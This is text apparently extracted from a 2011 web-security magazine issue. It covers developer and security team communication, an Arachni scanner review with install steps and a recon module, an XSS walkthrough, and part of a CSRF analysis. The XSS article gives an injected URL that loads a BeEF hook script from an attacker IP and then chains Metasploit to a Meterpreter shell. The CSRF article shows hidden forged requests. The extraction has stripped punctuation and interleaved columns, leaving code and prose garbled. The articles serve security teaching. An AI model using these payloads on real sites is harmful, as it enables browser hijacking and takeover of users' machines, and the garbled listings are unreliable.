One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
